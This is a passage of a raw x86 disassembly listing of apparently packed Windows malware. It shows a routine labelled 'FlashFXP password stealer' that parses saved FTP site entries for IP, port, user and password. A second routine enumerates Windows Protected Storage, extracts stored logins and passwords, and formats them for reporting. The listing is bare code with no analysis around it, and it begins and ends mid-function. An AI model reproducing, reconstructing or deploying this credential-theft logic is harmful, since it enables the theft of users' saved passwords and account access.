push [ebp+var_3BC]
call sub_416B90 ; fread
add esp, 10h
push [ebp+var_3C4]
call sub_416B82 ; fclose
pop ecx
mov eax, [ebp+var_3BC]
add eax, [ebp+var_3C0]
and byte ptr [eax], 0
mov eax, [ebp+var_3BC]
mov [ebp+var_3B8], eax
loc_414BA6: ; CODE XREF: sub_414A1E+428�j
push offset asc_41D3B0 ; "\r\n\r\n["
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5DC], eax
mov eax, [ebp+var_3B8]
mov [ebp+var_5D0], eax
push offset aIp ; "\r\nIP="
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5C8], eax
push offset aPort ; "\r\nPort="
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5D8], eax
push offset aUser_0 ; "\r\nUser="
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5CC], eax
push offset aPass_0 ; "\r\nPass="
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5D4], eax
cmp [ebp+var_5C8], 0
jz loc_414E13
cmp [ebp+var_5DC], 0
jz short loc_414C52
mov eax, [ebp+var_5C8]
cmp eax, [ebp+var_5DC]
jnb loc_414E13
loc_414C52: ; CODE XREF: sub_414A1E+220�j
cmp [ebp+var_5D8], 0
jz loc_414E13
cmp [ebp+var_5DC], 0
jz short loc_414C7A
mov eax, [ebp+var_5D8]
cmp eax, [ebp+var_5DC]
jnb loc_414E13
loc_414C7A: ; CODE XREF: sub_414A1E+248�j
cmp [ebp+var_5CC], 0
jz loc_414E13
cmp [ebp+var_5DC], 0
jz short loc_414CA2
mov eax, [ebp+var_5CC]
cmp eax, [ebp+var_5DC]
jnb loc_414E13
loc_414CA2: ; CODE XREF: sub_414A1E+270�j
cmp [ebp+var_5D4], 0
jz loc_414E13
cmp [ebp+var_5DC], 0
jz short loc_414CCA
mov eax, [ebp+var_5D4]
cmp eax, [ebp+var_5DC]
jnb loc_414E13
loc_414CCA: ; CODE XREF: sub_414A1E+298�j
and [ebp+var_4C4], 0
mov al, [ebp+var_4C4]
mov [ebp+var_3B4], al
mov al, [ebp+var_3B4]
mov [ebp+var_5C4], al
mov al, [ebp+var_5C4]
mov [ebp+var_444], al
mov al, [ebp+var_444]
mov [ebp+var_544], al
lea eax, [ebp+var_544]
push eax
push offset asc_41D384 ; "[%[^]]]\r\n"
push [ebp+var_5D0]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_444]
push eax
push offset aIp127s ; "\r\nIP=%127s\r\n"
push [ebp+var_5C8]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_5C4]
push eax
push offset aPort127s ; "\r\nPort=%127s\r\n"
push [ebp+var_5D8]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_3B4]
push eax
push offset aUser127s ; "\r\nUser=%127s\r\n"
push [ebp+var_5CC]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_4C4]
push eax
push offset aPass127s ; "\r\nPass=%127s\r\n"
push [ebp+var_5D4]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_4C4]
push eax
lea eax, [ebp+var_4C4]
push eax
call sub_4147E5
pop ecx
pop ecx
test eax, eax
jnz short loc_414DA1
jmp loc_414E4B
; ---------------------------------------------------------------------------
loc_414DA1: ; CODE XREF: sub_414A1E+37C�j
mov eax, [ebp+var_334]
inc eax
mov [ebp+var_334], eax
push 3E8h
call ds:dword_41709C ; Sleep
lea eax, [ebp+var_544]
push eax
lea eax, [ebp+var_5C4]
push eax
lea eax, [ebp+var_444]
push eax
lea eax, [ebp+var_4C4]
push eax
lea eax, [ebp+var_3B4]
push eax
push [ebp+var_334]
push offset dword_41D318
lea eax, [ebp+var_328]
push eax
call sub_40D53F
add esp, 20h
mov eax, [ebp+var_32C]
cmp dword ptr [eax+4], 0
jz short loc_414E13
push [ebp+var_3BC]
call sub_416B4C ; free
pop ecx
jmp loc_414EA6
; ---------------------------------------------------------------------------
loc_414E13: ; CODE XREF: sub_414A1E+213�j
; sub_414A1E+22E�j ...
mov eax, [ebp+var_184]
inc eax
mov [ebp+var_184], eax
mov eax, [ebp+var_5DC]
mov [ebp+var_3B8], eax
cmp [ebp+var_3B8], 0
jnz short loc_414E37
jmp short loc_414E4B
; ---------------------------------------------------------------------------
loc_414E37: ; CODE XREF: sub_414A1E+415�j
mov eax, [ebp+var_3B8]
add eax, 4
mov [ebp+var_3B8], eax
jmp loc_414BA6
; ---------------------------------------------------------------------------
loc_414E4B: ; CODE XREF: sub_414A1E+37E�j
; sub_414A1E+417�j
push [ebp+var_3BC]
call sub_416B4C ; free
pop ecx
loc_414E57: ; CODE XREF: sub_414A1E:loc_414EA6�j
mov al, [ebp+var_330]
mov [ebp+var_190], al
push 3E8h
call ds:dword_41709C ; Sleep
push [ebp+var_184]
push [ebp+var_334]
mov eax, [ebp+var_32C]
push dword ptr [eax]
push offset unk_41D2DC
lea eax, [ebp+var_328]
push eax
call sub_40D53F
add esp, 14h
loc_414E96: ; CODE XREF: sub_414A1E:loc_414EA8�j
; sub_414A1E:loc_414EAA�j
push [ebp+var_32C]
call sub_409763
pop ecx
xor eax, eax
jmp short locret_414EAC
; ---------------------------------------------------------------------------
loc_414EA6: ; CODE XREF: sub_414A1E+3F0�j
jmp short loc_414E57
; ---------------------------------------------------------------------------
loc_414EA8: ; CODE XREF: sub_414A1E+140�j
jmp short loc_414E96
; ---------------------------------------------------------------------------
loc_414EAA: ; CODE XREF: sub_414A1E+AC�j
jmp short loc_414E96
; ---------------------------------------------------------------------------
locret_414EAC: ; CODE XREF: sub_414A1E+48�j
; sub_414A1E+486�j
leave
retn 4
sub_414A1E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414EB0 proc near ; CODE XREF: sub_40A9CF+769�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414ECA
jmp short locret_414EF2
; ---------------------------------------------------------------------------
loc_414ECA: ; CODE XREF: sub_414EB0+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aFlashfxpPasswo ; "FlashFXP password stealer"
push 0
push [ebp+var_4]
push offset sub_414A1E
call sub_4095A4
add esp, 10h
locret_414EF2: ; CODE XREF: sub_414EB0+18�j
leave
retn
sub_414EB0 endp
; =============== S U B R O U T I N E =======================================
sub_414EF4 proc near ; DATA XREF: sub_415AF0+40�o
mov eax, offset loc_416FDD
call sub_416E10
sub esp, 0FFCh
push esi
push edi
push 1A7h
push dword ptr [ebp+8]
lea eax, [ebp-0BF0h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
and dword ptr [ebp-0A00h], 0
and dword ptr [ebp-4], 0
cmp dword ptr [ebp-0A00h], 0
jz short loc_414F4C
mov eax, [ebp-0A00h]
mov ecx, [ebp-0A00h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_414F4C: ; CODE XREF: sub_414EF4+44�j
and dword ptr [ebp-0A00h], 0
push 0
push 0
push 0
lea eax, [ebp-0A00h]
push eax
call ds:dword_41DF50
mov [ebp-0DF4h], eax
cmp dword ptr [ebp-0DF4h], 0
jge short loc_414FB2
push dword ptr [ebp-0BF0h]
call sub_409763
pop ecx
and dword ptr [ebp-0FD0h], 0
or dword ptr [ebp-4], 0FFFFFFFFh
cmp dword ptr [ebp-0A00h], 0
jz short loc_414FA7
mov eax, [ebp-0A00h]
mov ecx, [ebp-0A00h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_414FA7: ; CODE XREF: sub_414EF4+9F�j
mov eax, [ebp-0FD0h]
jmp loc_415AE0
; ---------------------------------------------------------------------------
loc_414FB2: ; CODE XREF: sub_414EF4+7F�j
and dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 1
cmp dword ptr [ebp-10h], 0
jz short loc_414FCC
mov eax, [ebp-10h]
mov ecx, [ebp-10h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_414FCC: ; CODE XREF: sub_414EF4+CA�j
and dword ptr [ebp-10h], 0
cmp dword ptr [ebp-0A00h], 0
jnz short loc_414FE3
push 80004003h
call sub_416E40
loc_414FE3: ; CODE XREF: sub_414EF4+E3�j
mov eax, [ebp-0A00h]
mov [ebp-0FE0h], eax
lea eax, [ebp-10h]
push eax
push 0
push 0
mov eax, [ebp-0FE0h]
mov eax, [eax]
push dword ptr [ebp-0FE0h]
call dword ptr [eax+38h]
mov [ebp-0FDCh], eax
cmp dword ptr [ebp-0FDCh], 0
jge short loc_41502D
push offset dword_41D648
push dword ptr [ebp-0FE0h]
push dword ptr [ebp-0FDCh]
call sub_416E4E
loc_41502D: ; CODE XREF: sub_414EF4+121�j
mov eax, [ebp-0FDCh]
mov [ebp-0DF4h], eax
cmp dword ptr [ebp-0DF4h], 0
jge short loc_415095
push dword ptr [ebp-0BF0h]
call sub_409763
pop ecx
and dword ptr [ebp-0FD4h], 0
and byte ptr [ebp-4], 0
cmp dword ptr [ebp-10h], 0
jz short loc_41506B
mov eax, [ebp-10h]
mov ecx, [ebp-10h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_41506B: ; CODE XREF: sub_414EF4+169�j
or dword ptr [ebp-4], 0FFFFFFFFh
cmp dword ptr [ebp-0A00h], 0
jz short loc_41508A
mov eax, [ebp-0A00h]
mov ecx, [ebp-0A00h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_41508A: ; CODE XREF: sub_414EF4+182�j
mov eax, [ebp-0FD4h]
jmp loc_415AE0
; ---------------------------------------------------------------------------
loc_415095: ; CODE XREF: sub_414EF4+14C�j
mov eax, [ebp-0BF0h]
push dword ptr [eax]
push offset unk_41D614
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 0Ch
and dword ptr [ebp-214h], 0
mov al, [ebp-0A54h]
mov [ebp-0A14h], al
and byte ptr [ebp-0A54h], 0
loc_4150CB: ; CODE XREF: sub_414EF4:loc_415A54�j
cmp dword ptr [ebp-10h], 0
jnz short loc_4150DB
push 80004003h
call sub_416E40
loc_4150DB: ; CODE XREF: sub_414EF4+1DB�j
push 0
lea eax, [ebp-0A10h]
push eax
push 1
mov eax, [ebp-10h]
mov [ebp-1000h], eax
mov eax, [ebp-1000h]
mov eax, [eax]
push dword ptr [ebp-1000h]
call dword ptr [eax+0Ch]
test eax, eax
jnz loc_415A59
mov eax, [ebp-0BF0h]
cmp dword ptr [eax+4], 0
jz short loc_415119
jmp loc_415A59
; ---------------------------------------------------------------------------
loc_415119: ; CODE XREF: sub_414EF4+21E�j
sub esp, 10h
lea esi, [ebp-0A10h]
mov edi, esp
movsd
movsd
movsd
movsd
push offset asc_41D610 ; "%x"
lea eax, [ebp-0A48h]
push eax
call ds:dword_4171E0 ; wsprintfA
add esp, 18h
and dword ptr [ebp-0DF8h], 0
mov byte ptr [ebp-4], 2
cmp dword ptr [ebp-0DF8h], 0
jz short loc_415163
mov eax, [ebp-0DF8h]
mov ecx, [ebp-0DF8h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415163: ; CODE XREF: sub_414EF4+25B�j
and dword ptr [ebp-0DF8h], 0
cmp dword ptr [ebp-0A00h], 0
jnz short loc_41517D
push 80004003h
call sub_416E40
loc_41517D: ; CODE XREF: sub_414EF4+27D�j
mov eax, [ebp-0A00h]
mov [ebp-0FE8h], eax
lea eax, [ebp-0DF8h]
push eax
push 0
lea eax, [ebp-0A10h]
push eax
push 0
mov eax, [ebp-0FE8h]
mov eax, [eax]
push dword ptr [ebp-0FE8h]
call dword ptr [eax+3Ch]
mov [ebp-0FE4h], eax
cmp dword ptr [ebp-0FE4h], 0
jge short loc_4151D1
push offset dword_41D648
push dword ptr [ebp-0FE8h]
push dword ptr [ebp-0FE4h]
call sub_416E4E
loc_4151D1: ; CODE XREF: sub_414EF4+2C5�j
mov eax, [ebp-0FE4h]
mov [ebp-0DF4h], eax
loc_4151DD: ; CODE XREF: sub_414EF4:loc_415A30�j
cmp dword ptr [ebp-0DF8h], 0
jnz short loc_4151F0
push 80004003h
call sub_416E40
loc_4151F0: ; CODE XREF: sub_414EF4+2F0�j
push 0
lea eax, [ebp-0E08h]
push eax
push 1
mov eax, [ebp-0DF8h]
mov [ebp-1004h], eax
mov eax, [ebp-1004h]
mov eax, [eax]
push dword ptr [ebp-1004h]
call dword ptr [eax+0Ch]
test eax, eax
jnz loc_415A35
and dword ptr [ebp-0E14h], 0
mov byte ptr [ebp-4], 3
cmp dword ptr [ebp-0E14h], 0
jz short loc_415246
mov eax, [ebp-0E14h]
mov ecx, [ebp-0E14h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415246: ; CODE XREF: sub_414EF4+33E�j
and dword ptr [ebp-0E14h], 0
cmp dword ptr [ebp-0A00h], 0
jnz short loc_415260
push 80004003h
call sub_416E40
loc_415260: ; CODE XREF: sub_414EF4+360�j
mov eax, [ebp-0A00h]
mov [ebp-0FF0h], eax
lea eax, [ebp-0E14h]
push eax
push 0
lea eax, [ebp-0E08h]
push eax
lea eax, [ebp-0A10h]
push eax
push 0
mov eax, [ebp-0FF0h]
mov eax, [eax]
push dword ptr [ebp-0FF0h]
call dword ptr [eax+54h]
mov [ebp-0FECh], eax
cmp dword ptr [ebp-0FECh], 0
jge short loc_4152BB
push offset dword_41D648
push dword ptr [ebp-0FF0h]
push dword ptr [ebp-0FECh]
call sub_416E4E
loc_4152BB: ; CODE XREF: sub_414EF4+3AF�j
mov eax, [ebp-0FECh]
mov [ebp-0E10h], eax
loc_4152C7: ; CODE XREF: sub_414EF4+B18�j
cmp dword ptr [ebp-0E14h], 0
jnz short loc_4152DA
push 80004003h
call sub_416E40
loc_4152DA: ; CODE XREF: sub_414EF4+3DA�j
push 0
lea eax, [ebp-0E0Ch]
push eax
push 1
mov eax, [ebp-0E14h]
mov [ebp-1008h], eax
mov eax, [ebp-1008h]
mov eax, [eax]
push dword ptr [ebp-1008h]
call dword ptr [eax+0Ch]
test eax, eax
jnz loc_415A11
push dword ptr [ebp-0E0Ch]
push offset aWs ; "%ws"
lea eax, [ebp-210h]
push eax
call ds:dword_4171E0 ; wsprintfA
add esp, 0Ch
and dword ptr [ebp-0E18h], 0
and dword ptr [ebp-0EE8h], 0
and dword ptr [ebp-0EE4h], 0
cmp dword ptr [ebp-0A00h], 0
jnz short loc_41534D
push 80004003h
call sub_416E40
loc_41534D: ; CODE XREF: sub_414EF4+44D�j
mov eax, [ebp-0E0Ch]
loc_415353: ; DATA XREF: UPX1:off_419100�o
mov [ebp-0FFCh], eax
mov eax, [ebp-0A00h]
mov [ebp-0FF8h], eax
push 0
push dword ptr [ebp-0EE4h]
lea eax, [ebp-0EE8h]
push eax
lea eax, [ebp-0E18h]
push eax
push dword ptr [ebp-0FFCh]
lea eax, [ebp-0E08h]
push eax
lea eax, [ebp-0A10h]
push eax
push 0
mov eax, [ebp-0FF8h]
mov eax, [eax]
push dword ptr [ebp-0FF8h]
call dword ptr [eax+44h]
mov [ebp-0FF4h], eax
cmp dword ptr [ebp-0FF4h], 0
jge short loc_4153C7
push offset dword_41D648
push dword ptr [ebp-0FF8h]
push dword ptr [ebp-0FF4h]
call sub_416E4E
loc_4153C7: ; CODE XREF: sub_414EF4+4BB�j
mov eax, [ebp-0FF4h]
mov [ebp-0E10h], eax
push dword ptr [ebp-0EE8h]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp-0E18h]
dec ecx
cmp eax, ecx
jnb loc_415477
and dword ptr [ebp-0EECh], 0
and dword ptr [ebp-0EF0h], 0
jmp short loc_41540C
; ---------------------------------------------------------------------------
loc_4153FE: ; CODE XREF: sub_414EF4+571�j
mov eax, [ebp-0EF0h]
inc eax
inc eax
mov [ebp-0EF0h], eax
loc_41540C: ; CODE XREF: sub_414EF4+508�j
mov eax, [ebp-0EF0h]
cmp eax, [ebp-0E18h]
jnb short loc_415467
mov eax, [ebp-0EE8h]
add eax, [ebp-0EF0h]
movzx eax, byte ptr [eax]
test eax, eax
jnz short loc_41543D
mov eax, [ebp-0EECh]
mov byte ptr [ebp+eax-9FCh], 2Ch
jmp short loc_415458
; ---------------------------------------------------------------------------
loc_41543D: ; CODE XREF: sub_414EF4+537�j
mov eax, [ebp-0EE8h]
add eax, [ebp-0EF0h]
mov ecx, [ebp-0EECh]
mov al, [eax]
mov [ebp+ecx-9FCh], al
loc_415458: ; CODE XREF: sub_414EF4+547�j
mov eax, [ebp-0EECh]
inc eax
mov [ebp-0EECh], eax
jmp short loc_4153FE
; ---------------------------------------------------------------------------
loc_415467: ; CODE XREF: sub_414EF4+524�j
mov eax, [ebp-0EECh]
and byte ptr [ebp+eax-9FDh], 0
jmp short loc_415492
; ---------------------------------------------------------------------------
loc_415477: ; CODE XREF: sub_414EF4+4F4�j
push dword ptr [ebp-0EE8h]
push offset dword_418B64
lea eax, [ebp-9FCh]
push eax
call ds:dword_4171E0 ; wsprintfA
add esp, 0Ch
loc_415492: ; CODE XREF: sub_414EF4+581�j
push offset byte_41DF00
lea eax, [ebp-7FCh]
push eax
call ds:dword_4170FC ; lstrcpyA
push offset byte_41DF00
lea eax, [ebp-0DF0h]
push eax
call ds:dword_4170FC ; lstrcpyA
push offset a220d5cc1 ; "220d5cc1"
lea eax, [ebp-0A48h]
push eax
call ds:dword_417108 ; lstrcmpA
test eax, eax
jnz short loc_41550C
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
movsx eax, byte ptr [ebp-0A57h]
test eax, eax
jnz short loc_41550C
lea eax, [ebp-9FCh]
push eax
lea eax, [ebp-210h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D5C0
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 14h
loc_41550C: ; CODE XREF: sub_414EF4+5D6�j
; sub_414EF4+5EE�j
push offset a5e7e8100 ; "5e7e8100"
lea eax, [ebp-0A48h]
push eax
call ds:dword_417108 ; lstrcmpA
test eax, eax
jnz loc_4155CE
push offset byte_41DF00
lea eax, [ebp-0EE0h]
push eax
call ds:dword_4170FC ; lstrcpyA
push offset asc_4184FC ; ":"
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_415587
push offset asc_4184FC ; ":"
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
inc eax
push eax
lea eax, [ebp-0EE0h]
push eax
call ds:dword_4170FC ; lstrcpyA
push offset asc_4184FC ; ":"
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_415587: ; CODE XREF: sub_414EF4+659�j
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
push 3E8h
call ds:dword_41709C ; Sleep
lea eax, [ebp-0EE0h]
push eax
lea eax, [ebp-9FCh]
push eax
lea eax, [ebp-210h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D55C
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 18h
loc_4155CE: ; CODE XREF: sub_414EF4+62C�j
push offset aB9819c52 ; "b9819c52"
lea eax, [ebp-0A48h]
push eax
call ds:dword_417108 ; lstrcmpA
test eax, eax
jnz loc_415842
and dword ptr [ebp-0FC8h], 0
mov dword ptr [ebp-0EFCh], 1
and dword ptr [ebp-0FCCh], 0
jmp short loc_415610
; ---------------------------------------------------------------------------
loc_415602: ; CODE XREF: sub_414EF4:loc_4156CF�j
mov eax, [ebp-0FCCh]
inc eax
inc eax
mov [ebp-0FCCh], eax
loc_415610: ; CODE XREF: sub_414EF4+70C�j
mov eax, [ebp-0FCCh]
cmp eax, [ebp-0E18h]
jnb loc_4156D4
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
movzx eax, byte ptr [eax]
test eax, eax
jnz short loc_415652
mov eax, [ebp-0FC8h]
mov byte ptr [ebp+eax-9FCh], 2Ch
mov eax, [ebp-0FC8h]
inc eax
mov [ebp-0FC8h], eax
jmp short loc_4156CF
; ---------------------------------------------------------------------------
loc_415652: ; CODE XREF: sub_414EF4+73F�j
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
mov al, [eax]
push eax
call ds:dword_4171DC ; IsCharAlphaNumericA
test eax, eax
jnz short loc_4156A7
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
movzx eax, byte ptr [eax]
cmp eax, 40h
jz short loc_4156A7
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
movzx eax, byte ptr [eax]
cmp eax, 2Eh
jz short loc_4156A7
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
movzx eax, byte ptr [eax]
cmp eax, 5Fh
jnz short loc_4156CF
loc_4156A7: ; CODE XREF: sub_414EF4+775�j
; sub_414EF4+789�j ...
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
mov ecx, [ebp-0FC8h]
mov al, [eax]
mov [ebp+ecx-9FCh], al
mov eax, [ebp-0FC8h]
inc eax
mov [ebp-0FC8h], eax
loc_4156CF: ; CODE XREF: sub_414EF4+75C�j
; sub_414EF4+7B1�j
jmp loc_415602
; ---------------------------------------------------------------------------
loc_4156D4: ; CODE XREF: sub_414EF4+728�j
mov eax, [ebp-0FC8h]
and byte ptr [ebp+eax-9FDh], 0
lea eax, [ebp-9FAh]
mov [ebp-0EF4h], eax
and dword ptr [ebp-0EF8h], 0
jmp short loc_415704
; ---------------------------------------------------------------------------
loc_4156F7: ; CODE XREF: sub_414EF4:loc_41583D�j
mov eax, [ebp-0EF8h]
inc eax
mov [ebp-0EF8h], eax
loc_415704: ; CODE XREF: sub_414EF4+801�j
mov eax, [ebp-0EE8h]
movzx eax, byte ptr [eax+4]
cmp [ebp-0EF8h], eax
jge loc_415842
mov eax, [ebp-0EF4h]
inc eax
push eax
lea eax, [ebp-0FC4h]
push eax
call ds:dword_4170FC ; lstrcpyA
push offset dword_41D54C
lea eax, [ebp-0FC4h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_41575C
push offset dword_41D54C
lea eax, [ebp-0FC4h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_41575C: ; CODE XREF: sub_414EF4+850�j
push offset dword_41D54C
mov eax, [ebp-0EF4h]
inc eax
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_415798
push offset dword_41D54C
mov eax, [ebp-0EF4h]
inc eax
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
inc eax
inc eax
push eax
lea eax, [ebp-0F60h]
push eax
call ds:dword_4170FC ; lstrcpyA
loc_415798: ; CODE XREF: sub_414EF4+87E�j
push offset dword_41D54C
lea eax, [ebp-0F60h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_4157C5
push offset dword_41D54C
lea eax, [ebp-0F60h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_4157C5: ; CODE XREF: sub_414EF4+8B9�j
push offset dword_41D54C
mov eax, [ebp-0EF4h]
inc eax
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov esi, eax
lea eax, [ebp-0F60h]
push eax
call ds:dword_41703C ; lstrlenA
lea eax, [esi+eax+9]
mov [ebp-0EF4h], eax
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
push 3E8h
call ds:dword_41709C ; Sleep
movsx eax, byte ptr [ebp-0A57h]
test eax, eax
jnz short loc_41583D
lea eax, [ebp-0F60h]
push eax
lea eax, [ebp-0FC4h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D50C
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 14h
loc_41583D: ; CODE XREF: sub_414EF4+91F�j
jmp loc_4156F7
; ---------------------------------------------------------------------------
loc_415842: ; CODE XREF: sub_414EF4+6EE�j
; sub_414EF4+820�j
push offset aE161255a ; "e161255a"
lea eax, [ebp-0A48h]
push eax
call ds:dword_417108 ; lstrcmpA
test eax, eax
jnz loc_4159E0
push offset aStringindex ; "StringIndex"
lea eax, [ebp-210h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jnz loc_4159E0
push offset dword_41D4EC
lea eax, [ebp-210h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_4158A4
push offset dword_41D4EC
lea eax, [ebp-210h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_4158A4: ; CODE XREF: sub_414EF4+998�j
push 8
lea eax, [ebp-210h]
push eax
lea eax, [ebp-0EE0h]
push eax
call ds:dword_417100 ; lstrcpynA
push offset dword_41D4E4
lea eax, [ebp-0EE0h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jnz short loc_415938
push offset dword_41D4DC
lea eax, [ebp-0EE0h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jnz short loc_415938
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
push 3E8h
call ds:dword_41709C ; Sleep
movsx eax, byte ptr [ebp-0A57h]
test eax, eax
jnz short loc_415933
lea eax, [ebp-9FCh]
push eax
lea eax, [ebp-210h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D494
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 14h
loc_415933: ; CODE XREF: sub_414EF4+A15�j
jmp loc_4159E0
; ---------------------------------------------------------------------------
loc_415938: ; CODE XREF: sub_414EF4+9DB�j
; sub_414EF4+9F2�j
push offset byte_41DF00
lea eax, [ebp-0EE0h]
push eax
call ds:dword_4170FC ; lstrcpyA
push offset dword_41D54C
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_415999
push offset dword_41D54C
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
inc eax
push eax
lea eax, [ebp-0EE0h]
push eax
call ds:dword_4170FC ; lstrcpyA
push offset dword_41D54C
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_415999: ; CODE XREF: sub_414EF4+A6B�j
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
push 3E8h
call ds:dword_41709C ; Sleep
lea eax, [ebp-0EE0h]
push eax
lea eax, [ebp-9FCh]
push eax
lea eax, [ebp-210h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D438
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 18h
loc_4159E0: ; CODE XREF: sub_414EF4+962�j
; sub_414EF4+97D�j ...
push 200h
push 0
lea eax, [ebp-210h]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push 200h
push 0
lea eax, [ebp-9FCh]
push eax
call sub_416B6A ; memset
add esp, 0Ch
jmp loc_4152C7
; ---------------------------------------------------------------------------
loc_415A11: ; CODE XREF: sub_414EF4+410�j
mov byte ptr [ebp-4], 2
cmp dword ptr [ebp-0E14h], 0
jz short loc_415A30
mov eax, [ebp-0E14h]
mov ecx, [ebp-0E14h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415A30: ; CODE XREF: sub_414EF4+B28�j
jmp loc_4151DD
; ---------------------------------------------------------------------------
loc_415A35: ; CODE XREF: sub_414EF4+326�j
mov byte ptr [ebp-4], 1
cmp dword ptr [ebp-0DF8h], 0
jz short loc_415A54
mov eax, [ebp-0DF8h]
mov ecx, [ebp-0DF8h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415A54: ; CODE XREF: sub_414EF4+B4C�j
jmp loc_4150CB
; ---------------------------------------------------------------------------
loc_415A59: ; CODE XREF: sub_414EF4+20E�j
; sub_414EF4+220�j
mov al, [ebp-0A14h]
mov [ebp-0A54h], al
push 3E8h
call ds:dword_41709C ; Sleep
push dword ptr [ebp-214h]
mov eax, [ebp-0BF0h]
push dword ptr [eax]
push offset unk_41D3FC
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 10h
push dword ptr [ebp-0BF0h]
call sub_409763
pop ecx
and dword ptr [ebp-0FD8h], 0
and byte ptr [ebp-4], 0
cmp dword ptr [ebp-10h], 0
jz short loc_415ABB
mov eax, [ebp-10h]
mov ecx, [ebp-10h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415ABB: ; CODE XREF: sub_414EF4+BB9�j
or dword ptr [ebp-4], 0FFFFFFFFh
cmp dword ptr [ebp-0A00h], 0
jz short loc_415ADA
mov eax, [ebp-0A00h]
mov ecx, [ebp-0A00h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415ADA: ; CODE XREF: sub_414EF4+BD2�j
mov eax, [ebp-0FD8h]
loc_415AE0: ; CODE XREF: sub_414EF4+B9�j
; sub_414EF4+19C�j
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
pop edi
pop esi
leave
retn 4
sub_414EF4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415AF0 proc near ; CODE XREF: sub_40A9CF+7F�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
